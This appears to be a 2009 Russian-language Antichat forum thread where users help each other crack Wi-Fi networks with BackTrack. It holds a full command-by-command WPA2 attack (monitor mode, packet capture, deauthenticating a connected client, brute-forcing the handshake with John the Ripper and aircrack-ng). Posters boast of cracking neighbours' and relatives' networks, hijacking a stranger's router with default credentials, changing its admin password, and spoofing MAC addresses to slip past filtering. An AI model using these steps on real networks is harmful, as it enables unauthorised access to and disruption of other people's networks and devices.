ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Беспроводные технологии/Wi-Fi/Wardriving (https://forum.antichat.io/forumdisplay.php?f=113)
-   -   [Wi-Fi, BT] Задай вопрос - получи ответ! (https://forum.antichat.io/showthread.php?t=48818)

boykent 15.05.2009 02:21

Semby68

Спасибо большое! Буду пробовать,но можете подсказать мне получаеться нужно загружатся с usb? а если не получится с usb загрузится? с диска может попробывать,там всё тоже нужно делать?

Semby68 15.05.2009 11:06

Цитата:

Сообщение от boykent
Semby68

Спасибо большое! Буду пробовать,но можете подсказать мне получаеться нужно загружатся с usb? а если не получится с usb загрузится? с диска может попробывать,там всё тоже нужно делать?

всё тоже самоe! только ВТ залей на SD .

удачи !

вышел и ВТ-4 , но под него они не идут !
да и карту не забудь перевести в режим мониторинга!

Для начала переводим карту в режим "monitor mode" :

root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
(monitor mode enabled on mon0)

удачи !

boykent 15.05.2009 19:48

Semby68
Спасибо тебе огромное!!! Только не могу найти описание заливки образа ISO на USB, там где программа лежит я не нашол описания! Можешь помоч? Просто у меня спутниковый интернет с небольшой скоростью и если я начну качать образ для CD это займёт немало времени!А для USB я сегодня на работе скачал хотя там лимит и вышло на девятьсот с чемто рублей,так что понаглеть нельзя сильно наглядно будет!

boykent 15.05.2009 21:48

Semby68

Получилось залить на USB!!! И даже загрузился с флешки! Но есть одно но при загрузке БТ3 просит ввести какойто Login и Password! Что это может быть? И далее я не понял где мне прописывать путь к spoonwep2.lzm,SWPA.lzm их что тоже нужно на другую флешку скинуть и вставить когда загрузится БТ3? Извени если я всё переспрашиваю, потому как я только начинающий (чайник) и мне пока многое не понятно!!! и ещё, ты там написал что надо перевести карту в режим мониторинга, можно поподробнее, ато я не пойму где находятся все настройки!Просто у меня прога CommView for WiFi сама установила свои дрова для перевода в режим мониторинга, а здесь я не пойму как!?

t_serega 16.05.2009 09:15

Прошу совета по настройке Orient XG-701A+ под Ubuntu 9.04 на Asus EEE PC 1000H
Ставлю дополнительным WiFi-адаптером, т.к. цепляю внешнюю антенну D-Link ANT24-0600.
На нетбуке стоит десктопная версия Ubuntu 9.04
Пересобирал ядро через Array.org на 2.6.28-12-netbook-eeepc
Из-за этого, думаю, система не видит модуля zd1211rw для чипсета ZD1211
Подскажите как по новой интегрировать zd1211rw в ядро (подробно по шагам :-) )?

maxad 16.05.2009 11:17

а можно пару вопросиков! как на вт3 установить tkiptun-ng? и еще как можно проверить подключение после сбора data пакетов и получение ключа. из консоли? а то постоянно нужно перегружаться чтоб wifi заработал на подключение! зарание спасибо!!!

Semby68 16.05.2009 17:58

Цитата:

Сообщение от boykent
Semby68

Получилось залить на USB!!! И даже загрузился с флешки! Но есть одно но при загрузке БТ3 просит ввести какойто Login и Password! Что это может быть? И далее я не понял где мне прописывать путь к spoonwep2.lzm,SWPA.lzm их что тоже нужно на другую флешку скинуть и вставить когда загрузится БТ3? Извени если я всё переспрашиваю, потому как я только начинающий (чайник) и мне пока многое не понятно!!! и ещё, ты там написал что надо перевести карту в режим мониторинга, можно поподробнее, ато я не пойму где находятся все настройки!Просто у меня прога CommView for WiFi сама установила свои дрова для перевода в режим мониторинга, а здесь я не пойму как!?

Это в ВТ-4 надо прописывать Login и Password, но в ВТ-4 эти проги не будут рулить!! Ну а если просит Login #root
Password # toor
#startx
spoonwep2.lzm,SWPA.lzm закинь на другое USB,
и вставь его после загрузки ВТ
откроешь консоль ком.строки и пишешь
airmon-ng

Отобразиться список всех доступных WiFi адаптеров.
выберешь тот который будешь
использовать
у меня < mon0 >
После набери
airmon-ng start {имя адаптера}

http://benjy-blog.blogspot.com/2008/07/spoonwep2-prsentation.html

http://neovortex.kodings.googlepages.com/spoonwep2vid.htm

Semby68 16.05.2009 22:39

Цитата:

Сообщение от Semby68
Это в ВТ-4 надо прописывать Login и Password, но в ВТ-4 эти проги не будут рулить!! Ну а если просит Login #root
Password # toor
#startx
spoonwep2.lzm,SWPA.lzm закинь на другое USB,
и вставь его после загрузки ВТ
откроешь консоль ком.строки и пишешь
airmon-ng

Отобразиться список всех доступных WiFi адаптеров.
выберешь тот который будешь
использовать
у меня < mon0 >
После набери
airmon-ng start {имя адаптера}

http://benjy-blog.blogspot.com/2008/07/spoonwep2-prsentation.html

http://neovortex.kodings.googlepages.com/spoonwep2vid.htm

ещё ссылка
http://www.metacafe.com/watch/1720626//

Semby68 16.05.2009 22:43

Цитата:

Сообщение от Semby68
ещё ссылка
http://www.metacafe.com/watch/1720626//

http://zrfree.com/2009/02/simply-crack-wireless-passwords-with-bt3.html

Semby68 17.05.2009 01:26

что-то не получается запустить WI-fi в ВТ-4 ,может кто знает как ? заранее благодарю !
не вижу сетей чтоб подключится.

boykent 17.05.2009 13:29

Semby68
Привет. Спасибо тебе! Перевёл я карту в режим мониторинга. И сново появилась проблема!Когда я прописываю путь bt# /usr/bin/lzm2dir/mnt/sde1/spoonwep2.lzm/ и bt# /usr/bin/lzm2dir/mnt/sde1/SWPA.lzm/ мне пишет Not a directory! Что это может быть? Я пробывал как с usb так и с системы эти файлы прописывать но ничего не получилось! А когда я захожу в K/backtrack/Radio Network Analysis/80211/All/ то у меня там можно увидеть только Spoonwep! А вот Spoonwep2 и Spoonwpa вообще нет!!! Может чё подскажешь или ещё кто знает?

Semby68 17.05.2009 15:31

Цитата:

Сообщение от boykent
Semby68
Привет. Спасибо тебе! Перевёл я карту в режим мониторинга. И сново появилась проблема!Когда я прописываю путь bt# /usr/bin/lzm2dir/mnt/sde1/spoonwep2.lzm/ и bt# /usr/bin/lzm2dir/mnt/sde1/SWPA.lzm/ мне пишет Not a directory! Что это может быть? Я пробывал как с usb так и с системы эти файлы прописывать но ничего не получилось! А когда я захожу в K/backtrack/Radio Network Analysis/80211/All/ то у меня там можно увидеть только Spoonwep! А вот Spoonwep2 и Spoonwpa вообще нет!!! Может чё подскажешь или ещё кто знает?

по командам видно что пропустил несколько пробелов,
проще скопируй команды в блокнот и его скинь на usb, и с блокнота копируй команды в консоль и запускайся ,если ты правильно написал что твоё usb отобразилось sde1
то,
airmon-ng

airmon-ng start rausb0 { в место rausb0 твой драйвер wi-fi карты}

/usr/bin/lzm2dir /mnt/sde1/spoonwep2.lzm /

/usr/bin/lzm2dir /mnt/sde1/SWPA.lzm /

смотри всё тоже но после lzm2di пробел и после .lzm пробел.Да и ещё если usb будешь вытаскивать вставлять то буква будет меняться , например sde1 ,sdb1 ,sdd1,и тд. А потом ищешь как и раньше. Вроде ошибки не должно быть. Удачи !!!

boykent 17.05.2009 22:23

Semby68
Спасибо, попробую! И ТЕбе удачи во всех твоих делах!!!

Semby68 19.05.2009 15:15

Цитата:

Сообщение от boykent
Semby68
Спасибо, попробую! И ТЕбе удачи во всех твоих делах!!!

если очень заинтересовал ВТ-3 ?

могу отписать команды на взлом WEP с консоли , это быстрее подберёшь ключ чем / Spoonwep2.lzm / !!!
semby68

boykent 19.05.2009 19:31

Semby68
Привет, если можешь опиши. В ВТ-3 всё получилось с командами прописать путь к файлам!Спасибо! Ещё вопросик есть. Как взломать сети WiFi с WPA2, WPA2-TSK, WPA-PSP, и т.д?Просто возле меня их много и многие вот с таким шифрованием.Или их не как нельзя!

razb 19.05.2009 19:48

Цитата:

Как взломать сети WiFi с WPA2, WPA2-TSK, WPA-PSP, и т.д?Просто возле меня их много и многие вот с таким шифрованием.Или их не как нельзя!
Статьи почитать не судьба?

Semby68 19.05.2009 22:45

Цитата:

Сообщение от razb
Статьи почитать не судьба?

есть кое что ! но это с ВТ-4 , сам пробую WPA взломать но пока в ожидании , у парня сетка висит WPA а рядом больше ничего нет , так вот уже вторые сутки ВТ-4 крутит, и пока ожидаем результат, по словарям её не вскрыли ,пробуем то что есть в самом ВТ-4.

если хочешь попробуй !

скачай ВТ-4 ISO и залей на USB или на CD .

Вход в ВТ-4 Login # root дави Enter

# toor дави Enter

# startx дави Enter

Переводишь карту в режим мониторинга.

команды которые отпишу закинь в блокнот и блокнот скинь на USB . но когда начинается загрузка ВТ-4 USB должно сразу стоять в компе иначе его не откроешь
потом ищи его системе ВТ-4 если не знаешь как ,то просмотри весь ВТ-4 я думаю что найдёшь.

Не забудь о правильном копирование или создании команд , иначе Default

Для начала переводим карту в режим "monitor mode" :

root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng

root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
(monitor mode enabled on mon0)

Сделано, и теперь мы можем использовать карту как mon0

Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :

root@bt:~# airodump-ng mon0
CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet

Остановите airodump-ng и запустите его заново, записывая все пакеты в файл: остановить клавиши Ctrl +C , нажать обе.

и запускаем заново

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу:

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

Остановите airodump-ng и убедитесь что все необходимые файлы созданы

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

Успешность взлома напрямую зависит от сложности пароля. Другими словами, вам может повезти и вы найдете ключ сразу, или не найдете его совсем.
Следующий метод, брутфорс, будет успешным практически наверняка, но может занять очень длительный срок. Необходимо понимать, что ключ WPA2 может содержать до 64-ех символов. Для начала взлома, если вы хотите использовать John The Ripper для создания всех возможных парольных комбинаций, выполните следующую команду.

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

вроде всё так , пробуй , может повезёт . удачи !!!

boykent 21.05.2009 02:09

Спасибо, попробую. А ты если можешь , отпишись, получилось взломать WPA с помошью ВТ-4! Очень интересно! А вот у меня пока ещё ничего не получилось!Не могу взломать никакую сеть хотя всё вроде правильно делаю, пробую каждый день понемногу, а так хочется!

boykent 21.05.2009 21:32

Semby68

Привет. Скажи мне пожалуйста, у тебя получалось взломать WPA или WEP? Я почемуто не могу не какую взломать! Есть и WPA,WPA2 и причём не одна. Есть WEP скрытая, пытался сначало поломать её ,сделал так как ты всё описал,но так ничего и не добился!Может я мало пакетов собираю? Самое большее собрал 250000 примерно!Потом пытался WPA поломать, тоже не чего!Никак не могу впоймать handshake! Рядом с сетью нет клиента, второй способ не помог как ты описывал! Чё мож не так делаю, всё вроде делаю так как ты описал!

Semby68 22.05.2009 00:56

Цитата:

Сообщение от boykent
Semby68

Привет. Скажи мне пожалуйста, у тебя получалось взломать WPA или WEP? Я почемуто не могу не какую взломать! Есть и WPA,WPA2 и причём не одна. Есть WEP скрытая, пытался сначало поломать её ,сделал так как ты всё описал,но так ничего и не добился!Может я мало пакетов собираю? Самое большее собрал 250000 примерно!Потом пытался WPA поломать, тоже не чего!Никак не могу впоймать handshake! Рядом с сетью нет клиента, второй способ не помог как ты описывал! Чё мож не так делаю, всё вроде делаю так как ты описал!

WEP сети которые у меня видны я все поломал , даже у родственников в другом городе в ВТ-3 это гдето 15-18 сеток прогой Spoonwep2.lzm,эта прога должна сама определить сколько ей надо пакетов автоматом и выдать тебе ключ ,посмотри внимательно видео , в этой проге атаки можно менять , может мало ждал?

Semby68 22.05.2009 01:03

с WPA пока не чего не получается не по словарям не другой командой ,пока собираю словари и другое описание на взлом.

boykent 22.05.2009 16:43

Semby68
Добрый день. Вот я смотрю у тебя когда ты переводишь свой адаптер WiFi мониторить отображается название твоего адаптера WiFi. Это когда ты пишешь в консоли airmon-ng! Я так понял ты используешь USB адаптер?! У меня почему то отображается только wifi0,ath0,ath1! а вот самого точного названия нет! Я выбираю wifi0 всё работает,также и остальные ath0,ath1, сети карта видит!Вопрос, обязательно должно определятся название моей PCI карты WiFi?

boykent 22.05.2009 18:19

забыл довавить!Адаптер которые я вижу: wifi0 » Atheros » madwifi-ng и другая ath0 » Atheros » madwifi-ng VAP ( parent: wifi0 ), а вот PCI адаптера wifi названия нет!

Semby68 22.05.2009 20:37

Цитата:

Сообщение от boykent
забыл довавить!Адаптер которые я вижу: wifi0 » Atheros » madwifi-ng и другая ath0 » Atheros » madwifi-ng VAP ( parent: wifi0 ), а вот PCI адаптера wifi названия нет!

смотри сюда ты наверно мало читал статей

# airmon-ng - Enter

отображается твой адаптер wifi0 и ath0 ,

чтоб перевести твою карту в режим мониторинга надо набирать команду !
# airmon-ng start wifi0 - Entr

получишь драйвер мониторинга wifi карты ath1 он и является (monitor mode enabled on ath1)

# airodump-ng ath1
только с этим драйвером ты можешь собирать пакеты

Totoshka35 22.05.2009 21:49

Всем привет. Попал в такую ситуацию, может кто подскажет выход =) Есть открытая сетька без шифрования, я к ней спокойно подрубался раньше. Ради прикола решил подрубится к роутеру, ввёл айпишник его, ввёл стандартные логин и пароль - и пустило. В связи с частымипадениями скорости инета через данную сеть у меня, решил поиграться с фильтрацией МАС адресов. С удивлением обнаружил, что помимо меня к этой сети подрубаются ещё человек 10. Внёс их МАС-и в список, поставил галочку запрет. Всё стало пошустрее, но почему-то последние 2 МАС-а продолжали беспрепятственно сидеть в сети, и через пару дней. Решил пойти другим способом - внести мой МАС и МАС хозяина в список разрешённых. Для начала удалил все МАС-и, и поставил галочку разрешить заранее.. Не внеся ни один МАС в список. И вот теперь к сети не подрубится, ибо в списке для разрешения доступа нет ни одного МАС адреса! Что можно сделать в данной ситуации?? Пробовал МАС, состоящий из одних нулей - не подключает. Есть какая-то возможность подрубится к данной сети?? ХОтя бы для изменения настроек роутера на по умолчанию???

boykent 22.05.2009 21:56

Semby68
Спасибо.А ты не знаешь как насчёт того допустим если я подключусь с сети это могут увидеть?и другие тоже могут видеть мой адаптер?

Semby68 23.05.2009 12:03

Цитата:

Сообщение от boykent
Semby68
Спасибо.А ты не знаешь как насчёт того допустим если я подключусь с сети это могут увидеть?и другие тоже могут видеть мой адаптер?

Адаптор нет,но то что ты подключен к сетке ,то да!
Я пол года вишу на одной сетке и всё нормально , нет проблем .Нашол в инете как сделать антэну WI-FI ,переделал свой адаптор под внешнюю антэну и нормально.Узнал как можно шифронуться в сети !
Но сильно не исчезнешь , есть проги ,типа сканеров ,WI-fi радаров, да и через Back-Track видно к какой сетке подрублен комп ,и сколько компов висит на сетке!Опытный пользователь Шифрует свою сеть в WPA ,скрывает ESSID,шифрует пакеты и тд. Но их не сильно много,в основном сами висят где нибудь, есть сеть пользуйся,но не расслабляйся, повышай навыки , только в практике можно достичь нормального результата .Прогресс идёт в перёд и нам надо двигаться .

Да может для простого пользователя я и шифронулся,да мне по барабану , несколь раз выкидывали меня с сетки, но я прописал IP адр. и DNS в ручную и в роуторе сменил пароль admin на свой и он согласился, чтоб я был клиентом этой сети! Удачи Semby. Spain

Semby68 23.05.2009 12:22

Цитата:

Сообщение от Totoshka35
Всем привет. Попал в такую ситуацию, может кто подскажет выход =) Есть открытая сетька без шифрования, я к ней спокойно подрубался раньше. Ради прикола решил подрубится к роутеру, ввёл айпишник его, ввёл стандартные логин и пароль - и пустило. В связи с частымипадениями скорости инета через данную сеть у меня, решил поиграться с фильтрацией МАС адресов. С удивлением обнаружил, что помимо меня к этой сети подрубаются ещё человек 10. Внёс их МАС-и в список, поставил галочку запрет. Всё стало пошустрее, но почему-то последние 2 МАС-а продолжали беспрепятственно сидеть в сети, и через пару дней. Решил пойти другим способом - внести мой МАС и МАС хозяина в список разрешённых. Для начала удалил все МАС-и, и поставил галочку разрешить заранее.. Не внеся ни один МАС в список. И вот теперь к сети не подрубится, ибо в списке для разрешения доступа нет ни одного МАС адреса! Что можно сделать в данной ситуации?? Пробовал МАС, состоящий из одних нулей - не подключает. Есть какая-то возможность подрубится к данной сети?? ХОтя бы для изменения настроек роутера на по умолчанию???

Я думаю надо подождать, если и хозяин не может войти в инет ,то он должен что-то предпринять!

Totoshka35 23.05.2009 16:02

Всё, конесно, логично, стоит подождать. Но меня просто беспокоит то, что как бы не навели на хозяина такие проблемы о некоей, мягко говоря незащищённости его точки доступа и не появилась она уже в обновлённом виде с шифрованием впа2. Хотелось бы просто скорее вернуть всё на свои места, пока он это не просёк

boykent 24.05.2009 10:50

Кто знает, влияет ли качество сигнала на взлом WiFi?

_SEREGA_ 24.05.2009 14:14

Цитата:

Сообщение от boykent
Кто знает, влияет ли качество сигнала на взлом WiFi?

При проведение атак с пакетной инъекцией оч. даже сильно влияет. При слабом сигнале те атаки не получатся. Тестируй aireplay-ng -9 device. Кстати на некоторых картачках можно регулировать сигнал с помощью iwconfig

sandazh 25.05.2009 15:16

Люди, хелп!
Помогите подобрать карточку (и главное не ошибиться), которая будет поддерживаться и BackTrack 3 и KisMac!

razb 25.05.2009 15:37

В карте раздела есть статья по адаптерам пригодным для вардрайвинга, вот там и смотри.

sandazh 25.05.2009 16:24

Цитата:

Сообщение от razb
В карте раздела есть статья по адаптерам пригодным для вардрайвинга, вот там и смотри.

да, но проблема в том, что одна и таже карта может и не поддерживаться одновременно и KisMac-ом и BT3

boykent 25.05.2009 17:21

_SEREGA_
Спасибо.Можешь написать как регулировать сигнал с помошью iwconfig,точнее где зто прописать надо?

Scorpion. 26.05.2009 09:11

boykent, ты что используеш,backtrack? тогда пиши в консоль
Код:

iwconfig eth0 txpower auto
потом
Код:

iwconfig eth0 txpower 20
1-ая команда включает управление мощностью
2-ая устанавливает мощность в дециБелах.
eth0 - это девайс твой
Не во всех картах есть возможность управлением мощности.

trup_slona 26.05.2009 09:34

У меня windows XP SP2, адаптер atheros AR5007EG. С помощью стандартного виндового сканера ничего не находится. Сканировал эфир через Network Stumbler, он всегда находит только одну скрытую точку с шифрованием. Скачал вчера CommView for WiFi, запустил сканирование, он тоже нашел эту точку и еще одну, которую не находит Network Stumbler. Первая точка на 11 канале, вторая на 13. На второй шифрования нет, ssid известен, но она скрытая.
Вопросы:
1) Почему Network Stumbler не находит вторую точку?
2) Как можно подключиться к скрытой точке? Добавлял сеть в список предпочитаемых, ничего не происходит.

Scorpion. 26.05.2009 09:42

Цитата:

Сообщение от trup_slona
У меня windows XP SP2, адаптер atheros AR5007EG. С помощью стандартного виндового сканера ничего не находится. Сканировал эфир через Network Stumbler, он всегда находит только одну скрытую точку с шифрованием. Скачал вчера CommView for WiFi, запустил сканирование, он тоже нашел эту точку и еще одну, которую не находит Network Stumbler. Первая точка на 11 канале, вторая на 13. На второй шифрования нет, ssid известен, но она скрытая.
Вопросы:
1) Почему Network Stumbler не находит вторую точку?
2) Как можно подключиться к скрытой точке? Добавлял сеть в список предпочитаемых, ничего не происходит.

1) Netstumbler это простой сканер пакетов-маячков от точек. Эти маячки говорят будто " Я точка ххх подрубайтесь ко мне. А CommView это снифер,более серьёзная программа ктороая перехватывает весь трафик в воздузе от точек, тем самым определя и скрытые точки,которые не отсылают моячки чтоб об из не узнали.
2)а тут Х.З. у каждого адаптера своя прога для подрубания,у меня например есть поле ввода скрытого имени для подключения к скрытой Т.Д.
может быть сигнал ещё слабый

trup_slona 26.05.2009 11:35

Установил я прогу для управления своим адаптером. Запустил в ней сканер, нашел все ту же сеть без имени, а другой сети нет. Вводил ее ssid - безрезультатно. CommView for WiFi показывает что работают обе точки. Возможно ли что я не могу подключиться из-за фильтрации mac-адресов? Или могут быть еще другие причины?

razb 26.05.2009 19:32

Цитата:

Возможно ли что я не могу подключиться из-за фильтрации mac-адресов? Или могут быть еще другие причины?
Если стоит мак фильтрация то не подключишься, смотри какие маки у клиентов и когда кто то из них отключится смени мак и подключись к сети.

Время: 21:35